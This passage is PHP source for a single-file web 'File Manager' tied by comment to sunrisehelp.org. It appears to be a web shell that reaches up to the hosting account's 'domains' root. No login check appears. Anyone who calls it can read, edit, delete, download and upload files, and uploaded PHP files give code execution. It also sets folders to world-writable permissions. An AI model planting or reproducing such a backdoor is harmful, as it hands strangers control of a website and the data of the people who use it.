sunrisehelp.org -> domains (root) */ // ========== ROOT / START ========== $base_dir = realpath(__DIR__); // public_html $root_anchor = realpath(__DIR__ . "/../../"); // domains (2 levels up) if ($root_anchor === false) $root_anchor = $base_dir; // default start folder relative from root $default_rel = trim(str_replace($root_anchor, '', $base_dir), DIRECTORY_SEPARATOR); // ========== HELPERS ========== function sanitize_path($path){ $path = str_replace('..', '', $path); $path = preg_replace('/[^a-zA-Z0-9\.\_\-\/]/', '', $path); return trim($path, '/'); } function safe_realpath_within($path, $allowed_root){ $rp = realpath($path); if($rp === false) return false; $root = rtrim($allowed_root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; return (strpos($rp . DIRECTORY_SEPARATOR, $root) === 0) ? $rp : false; } function get_file_list($dir){ $files = []; if(is_dir($dir)){ foreach(scandir($dir) as $item){ if($item === '.' || $item === '..') continue; $full = $dir . DIRECTORY_SEPARATOR . $item; $files[] = [ 'name' => $item, 'path' => $full, 'size' => is_file($full) ? filesize($full) : 0, 'type' => is_dir($full) ? 'directory' : 'file', 'modified' => date('Y-m-d H:i:s', filemtime($full)) ]; } } return $files; } function format_size($bytes){ if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; elseif ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; elseif ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; return $bytes . ' bytes'; } // ========== REQUEST DIR (IMPORTANT FIX) ========== /* Rule: - if dir param NOT provided at all -> open default public_html - if dir param provided as empty (?dir=) -> open root(domains) */ if (!isset($_GET['dir'])) { $requested_dir = $default_rel; // default view = public_html } else { $requested_dir = sanitize_path($_GET['dir']); // allow empty => root } // resolve safely $current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor); if($current_dir === false){ $requested_dir = ''; $current_dir = $root_anchor; } // current relative path from root $relative_current = trim(str_replace($root_anchor, '', $current_dir), DIRECTORY_SEPARATOR); // Parent dir (relative) $parent_dir = ''; if ($relative_current !== '') { $parent_dir = dirname($relative_current); if ($parent_dir === '.') $parent_dir = ''; } $is_at_root = ($relative_current === ''); // ========== ACTIONS ========== $action = $_GET['action'] ?? 'list'; switch($action){ case 'view': $file = sanitize_path($_GET['file'] ?? ''); $path = $current_dir . DIRECTORY_SEPARATOR . $file; $safe = safe_realpath_within($path, $root_anchor); if($safe && is_file($safe)){ header("Content-Type: text/plain"); readfile($safe); exit; } break; case 'edit': $file = sanitize_path($_GET['file'] ?? ''); $path = $current_dir . DIRECTORY_SEPARATOR . $file; $safe = safe_realpath_within($path, $root_anchor); if(!$safe || !is_file($safe)) break; if($_SERVER['REQUEST_METHOD'] === 'POST'){ file_put_contents($safe, $_POST['content']); header("Location: ?dir=" . urlencode($relative_current)); exit; } $content = htmlspecialchars(file_get_contents($safe)); echo "

Edit: " . htmlspecialchars($file) . "

"; echo ""; exit; case 'delete': $file = sanitize_path($_GET['file'] ?? ''); $path = $current_dir . DIRECTORY_SEPARATOR . $file; $safe = safe_realpath_within($path, $root_anchor); if(!$safe) break; if(is_dir($safe)){ $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($safe, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach($it as $f){ $f->isDir() ? rmdir($f->getRealPath()) : unlink($f->getRealPath()); } rmdir($safe); } else if(is_file($safe)){ unlink($safe); } header("Location: ?dir=" . urlencode($relative_current)); exit; case 'upload': if(!empty($_FILES['file'])){ $f = $_FILES['file']; if($f['error'] !== UPLOAD_ERR_OK){ echo "

Upload Failed: Error Code {$f['error']}

"; exit; } if(!is_writable($current_dir)){ @chmod($current_dir, 0777); } $name = basename($f['name']); $name = preg_replace('/[^a-zA-Z0-9\.\_\-]/', '', $name); $dest = $current_dir . DIRECTORY_SEPARATOR . $name; if(move_uploaded_file($f['tmp_name'], $dest)){ @chmod($dest, 0644); } else { echo "

move_uploaded_file FAILED

"; echo "TMP: {$f['tmp_name']}
"; echo "DEST: $dest
"; exit; } } header("Location: ?dir=" . urlencode($relative_current)); exit; case 'create_folder': $folder = sanitize_path($_POST['folder_name'] ?? ''); if($folder !== ''){ $path = $current_dir . DIRECTORY_SEPARATOR . $folder; $safeParent = safe_realpath_within($current_dir, $root_anchor); if($safeParent && !file_exists($path)){ mkdir($path, 0777, true); } } header("Location: ?dir=" . urlencode($relative_current)); exit; case 'download': $file = sanitize_path($_GET['file'] ?? ''); $path = $current_dir . DIRECTORY_SEPARATOR . $file; $safe = safe_realpath_within($path, $root_anchor); if($safe && is_file($safe)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($safe).'"'); header('Content-Length: ' . filesize($safe)); readfile($safe); exit; } break; } // ========== HTML LIST ========== $files = get_file_list($current_dir); ?> File Manager

File Manager

Root:
Current:

Back Back Default (public_html) Root (domains)

Name	Type	Size	Modified	Actions
				Open Edit Download Delete